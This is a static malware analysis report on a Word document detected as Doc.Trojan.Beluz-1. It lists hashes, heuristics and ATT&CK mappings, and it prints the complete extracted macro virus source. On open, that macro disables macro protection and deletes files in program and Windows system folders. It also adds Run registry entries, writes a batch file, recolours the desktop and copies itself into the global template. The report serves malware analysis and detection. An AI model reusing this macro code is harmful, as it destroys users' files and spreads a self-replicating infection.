Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27c352d454faaded…

MALICIOUS

Office (OLE)

41.5 KB Created: 2005-03-31 01:52:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 4a8ce33c97529c29dcd63440be5caa93 SHA-1: 0facf9d4d8900319a211296b9aa4d215e5aa3b9d SHA-256: 27c352d454faadedd63a9d294fd8ce52ef2602b9b86d128773f6c4684048915b
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic macro with AutoOpen and Auto_Close routines, indicative of older malware. The macro attempts to delete files from common program directories and displays a deceptive message. The ClamAV detection 'Doc.Trojan.Beluz-1' further confirms its malicious nature. The presence of VBA macros and the AutoOpen function strongly suggest this is a malicious document delivered as a spearphishing attachment.

Heuristics 6

  • ClamAV: Doc.Trojan.Beluz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beluz-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5728 bytes
SHA-256: 257754ed9f0c96675a9e1ea53fb5fd6d0585f0670574a7e30bcfd2bb923ce7fc
Detection
ClamAV: Doc.Trojan.Beluz-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Deneca"

'Virus macro name: Deneca
'************************
'Brasil 2005
'************************

Sub AutoOpen()
On Error Resume Next
With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
End With

MsgBox " Computador foi modificado agora!", vbOKOnly + vbCritical, "Virus declara!!"
WordBasic.Kill "C:\Program Files\Microsoft FrontPage\*.*"
WordBasic.Kill "C:\Program Files\GetRight\*.*"
WordBasic.Kill "C:\Program Files\Winzip\*.*"
WordBasic.Kill "C:\Program Files\Winamp\*.*"
WordBasic.Kill "C:\Arquivos de programas\Microsoft FrontPage\*.*"
WordBasic.Kill "C:\Arquivos de programas\GetRight\*.*"
WordBasic.Kill "C:\Arquivos de programas\Winzip\*.*"
WordBasic.Kill "C:\Arquivos de programas\Winamp\*.*"
WordBasic.Kill "C:\Windows\Application Data\*.*"
WordBasic.Kill "C:\Windows\System\*.*"
WordBasic.Kill "C:\Windows\Command\*.*"

With ActiveDocument.Shapes.AddShape _
        (msoShapeIsoscelesTriangle, 80, 80, 90, 50).Fill
        .ForeColor.RGB = RGB(255, 255, 0)
        .BackColor.RGB = RGB(255, 0, 0)
        .Patterned msoPatternDarkVertical

End With
ActiveDocument.Shapes.AddTextEffect _
    PresetTextEffect:=msoTextEffect13, _
    Text:="Seu desktop foi modificado!!", _
    FontName:="Times New Roman ", _
    FontSize:=24, _
    FontBold:=True, _
    FontItalic:=False, _
    Left:=InchesToPoints(1), _
    Top:=InchesToPoints(1), _
    Anchor:=ActiveDocument.Paragraphs(1).Range

With Assistant.NewBalloon
.Icon = msoIconAlertCritical
.Heading = "Virus diz!!"
.Text = "Fui ativado."
.Animation = msoAnimationWorkingAtSomething
.Show

ActiveDocument.SaveAs FileName:="C:\Beluz.doc"
ActiveDocument.Saved = True

End With

End Sub

Sub AutoClose()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Deneca") = "Virus salvado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Especial") = "C:\ARQUIV~1\Deneca.bat"
Open "C:\ARQUIV~1\Deneca.bat" For Output As #1
Print #1, "@echo off"
Print #1, "Echo         Seu computador apresenta problemas."
Print #1, "Echo         Estou dentro de seu computador."
Print #1, "Echo         Word macro virus."
Print #1, "Echo         Infectado com macro virus."
Print #1, "Echo         Macro virus word ativado."
Print #1, "Echo         Problema encontrado."
Print #1, "Echo         Computador alterado."
Print #1, "Echo         Ano 2005."
Close #1

 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Scrollbar", "255 0 0", "" 'Red
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Background", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Menu", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Window", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "WindowFrame", "0 255 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "MenuText", "0 255 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "HilightText", "0 0 0", "" 'Black
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonFace", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonShadow", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonText", "0 255 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InactiveTitleText", "0 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonDkShadow", "0 255 0", "" 'Green
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonLight", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoText", "255 0 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoWindow", "0 255 0", ""
 WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonAlternateFace", "255 0 0", ""

   'Changes windows desktop colors to Red

Set myRange = ActiveDocument.Content
myRange.Find.Execute FindText:="a", _
    ReplaceWith:="HOHOHOHO", Replace:=wdReplaceAll

iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Deneca"
    WordBasic.MacroCopy sMacro$, "Global:Deneca"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Deneca"
   End If
End Sub

Sub ToolsMacro()
    On Error Resume Next
    Application.DisplayStatusBar = False 'Disable Tools macro
    
End Sub

'Virus macro name: Deneca
'************************
'Ano 2005
'************************